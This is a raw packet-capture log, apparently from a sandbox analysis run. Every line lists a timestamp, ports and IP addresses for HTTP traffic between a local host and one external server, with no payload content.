Jul 26, 2024 12:57:06.317950964 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.318002939 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.318106890 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.318126917 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.318203926 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.318205118 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.318205118 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.318303108 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.318322897 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.318352938 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.318367958 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.318444967 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.318489075 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.318523884 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.318545103 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.318568945 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.318569899 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.318594933 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.318599939 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.318618059 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.318634033 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.319046974 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.319067001 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.319092035 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.319093943 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.319107056 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.319117069 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.319227934 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.319448948 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.319464922 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.319493055 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.319514036 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.319535017 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.319555044 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.319559097 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.319576979 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.319598913 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.319612026 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.319622040 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.319647074 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.320322037 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.320343018 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.320367098 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.320372105 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.320382118 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.320390940 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.320398092 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.320411921 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.320429087 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.320435047 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.320451021 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.320472002 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.335922003 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.335984945 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.336023092 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.336040020 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.336070061 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.336087942 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.336112976 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.336134911 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.336179972 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.336179972 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.336179972 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.336179972 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.336179972 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.336261034 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.337047100 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.337095976 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.337268114 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.337312937 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.337347984 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.337368965 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.337393045 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.337404966 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.337699890 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.337719917 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.337743998 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.337745905 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.337754011 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.337781906 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.337835073 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.337879896 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.338031054 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.338051081 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.338073969 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.338077068 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.338083982 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.338098049 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.338119030 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.338124037 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.338124037 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.338154078 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.338476896 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.338498116 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.338524103 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.338536978 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.338576078 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.338597059 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.338619947 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.338624001 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.338637114 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.338645935 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.338658094 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.338665009 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.338680983 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.338690042 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.338700056 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.338726997 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.339521885 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.339543104 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.339566946 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.339567900 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.339575052 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.339591026 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.339610100 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.339612961 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.339622974 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.339637041 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.339651108 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.339658022 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.339673042 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.339679003 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.339692116 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.339696884 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.339713097 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.339731932 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.340419054 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.340435028 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.340461969 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.340465069 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.340472937 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.340501070 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.340502977 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.340519905 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.340537071 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.340548038 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.340564966 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.340570927 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.340591908 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.340595961 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.340603113 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.340615988 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.340631008 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.340650082 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.341315985 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.341336966 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.341361046 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.341362000 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.341378927 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.341383934 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.341398954 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.341403008 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.341418982 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.341428041 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.341434956 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.341447115 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.341464043 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.341473103 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.341483116 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.341491938 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.341517925 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.341526985 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.342215061 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.342236042 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.342258930 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.342262030 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.342274904 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.342284918 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.342297077 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.342304945 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.342318058 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.342327118 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.342339039 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.342344999 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.342360020 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.342370033 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.342377901 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.342391968 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.342405081 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.342412949 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.342426062 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.342483044 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.343523979 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.343539953 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.343568087 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.343570948 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.343575954 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.343605995 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.349807978 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.349843979 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.349869967 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.349947929 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.349947929 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.349947929 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.349968910 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.349992990 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.350016117 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.350018978 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.350024939 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.350039005 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.350054026 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.350074053 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.409363985 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.409420013 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.409435987 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.409552097 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.409591913 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.409610033 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.409637928 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.409657001 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.409737110 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.409737110 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.409737110 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.409737110 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.410218000 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.410267115 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.410279036 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.410303116 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.410322905 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.410341024 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.410532951 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.410552979 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.410578966 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.410578966 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.410598040 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.410600901 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.410617113 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.410624027 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.410634995 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.410665989 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.411047935 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.411067963 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.411092043 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.411094904 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.411111116 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.411114931 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.411130905 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.411135912 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.411150932 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.411158085 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.411181927 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.411183119 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.411204100 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.411205053 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.411216974 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.411243916 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.411896944 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.411916018 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.411941051 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.411942005 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.411951065 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.411962032 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.411978960 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.411987066 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.412000895 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.412010908 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.412035942 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.412038088 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.412050962 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.412065029 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.412074089 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.412122965 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.412595987 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.412616968 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.412642956 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.412642956 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.412652016 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.412661076 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.412703037 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.412720919 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.428142071 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.428174019 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.428195000 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.428328991 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.428349972 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.428371906 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.428392887 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.428447008 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.428447008 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.428447008 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.428466082 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.429419994 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.429472923 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.429495096 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.429516077 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.429539919 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.429558039 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.429713011 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.429733038 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.429758072 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.429759026 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.429769039 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.429781914 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.429797888 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.429816961 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.430144072 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.430164099 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.430187941 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.430190086 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.430197954 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.430212975 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.430233955 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.430254936 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.430591106 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.430610895 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.430634975 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.430635929 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.430645943 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.430656910 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.430679083 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.430680037 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.430701971 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.430701971 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.430711985 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.430723906 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.430738926 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.430744886 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.430758953 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.430777073 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.431503057 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.431523085 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.431551933 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.431555986 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.431565046 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.431587934 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.431591988 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.431603909 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.431607008 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.431610107 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.431612968 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.431622028 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.431684971 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.432451963 CEST	80	60778	185.215.113.16	192.168.2.6
